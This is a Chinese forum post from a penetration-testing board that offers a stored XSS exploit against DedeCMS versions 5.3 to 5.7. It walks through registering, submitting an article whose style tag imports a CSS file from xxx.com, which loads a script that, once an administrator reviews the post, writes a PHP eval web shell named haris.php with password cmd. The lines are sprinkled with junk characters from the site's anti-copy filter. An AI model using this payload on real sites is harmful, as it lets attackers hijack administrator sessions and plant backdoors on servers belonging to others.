找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2037|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
  v0 X) v6 ^* x; t, `# p为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰). @, \' M, f0 x$ P- J+ R2 r
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
% ?. Y- Y( E& y下面说说利用方法。
7 P1 L! F- D, V" z条件有2个:
. O8 p  q+ j8 g1.开启注册# G8 ^$ J2 I) q, a6 c9 O7 S
2.开启投稿$ e! l3 c" R4 k; y
注册会员----发表文章
/ j  I, D7 ^+ q内容填写:7 d1 k) I* K1 n2 p% E
复制代码
9 R' y& G9 x3 {4 [<style>@im\port'\http://xxx.com/xss.css';</style>1 ^+ n7 z- B" b! ?4 _
新建XSS.Css
0 e1 R% {! o# |4 z5 r, F! N复制代码
) z' {6 k: W1 {.body{
, p  R* n! ~# Q! Xbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
$ r2 F( P, q% D9 `  D7 O新建xss.js 内容为/ ?2 ~( g" i: T. v2 k
复制代码. Q; u- N$ {% v. H* j3 g/ B
1.var request = false;6 [  G8 \0 V, n4 y  O5 {
2.if(window.XMLHttpRequest) {
/ }4 P' y. z( V3.request = new XMLHttpRequest();: \2 H2 O' n8 Y% t: b+ m3 D% |9 Z
4.if(request.overrideMimeType) {& ]& X' Z) q' J
5.request.overrideMimeType('text/xml');' e$ O$ N) I, f  e
6.}
+ k" I( {. W: U0 |* \' u5 q3 b) ?7.} else if(window.ActiveXObject) {7 |. k* b1 e9 z- P
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];0 Z6 @4 ~3 \* g
9.for(var i=0; i<versions.length; i++) {
5 K0 p4 \5 o; A" ?# \0 _/ z( [" I10.try {7 }8 E: }' D3 d3 {
11.request = new ActiveXObject(versions);- ]1 ~8 ?7 L+ z; x2 E
12.} catch(e) {}5 [: R& R3 D& L+ [; y" X3 \3 K2 l
13.}8 A! C% N) j& o  A- r
14.}" d9 D6 i% ~1 w: B4 \) K
15.xmlhttp=request;
! I. r; f: t5 Z1 S# ~16.function getFolder( url ){
" R. e5 Z8 ^6 B: Q9 f17. obj = url.split('/')" O* Y/ V" J9 N3 Y# G$ {
18. return obj[obj.length-2]
3 X- E1 u1 i% P9 g& @. O9 }19.}, ~9 x# k5 e3 Z4 e2 q& H3 |
20.oUrl = top.location.href;
+ k9 h9 X; ~- _8 X/ T! J21.u = getFolder(oUrl);
9 W( ^, k6 q! O, y9 H22.add_admin();3 h, |9 ~4 [& T9 i
23.function add_admin(){; ]2 X6 \4 s% o9 d- Z1 L
24.var url= "/"+u+"/sys_sql_query.php";7 n. k: \8 J% d" c9 Q9 u
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";8 q; e: ?1 R+ W! n% v/ g4 E
26.xmlhttp.open("POST", url, true);
- Q3 b* i6 `( U- V9 i0 m2 K27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");9 d1 V6 [& J0 A# a3 j4 y# _/ r" p. U
28.xmlhttp.setRequestHeader("Content-length", params.length);
- O7 D: l# f$ L1 l29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");( u. B1 p: g! H+ H7 D- t0 X( E
30.xmlhttp.send(params);
, C# R  B+ B- ?  `* M31.}
* D, c( C* @1 O! I6 A) V* N8 `当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表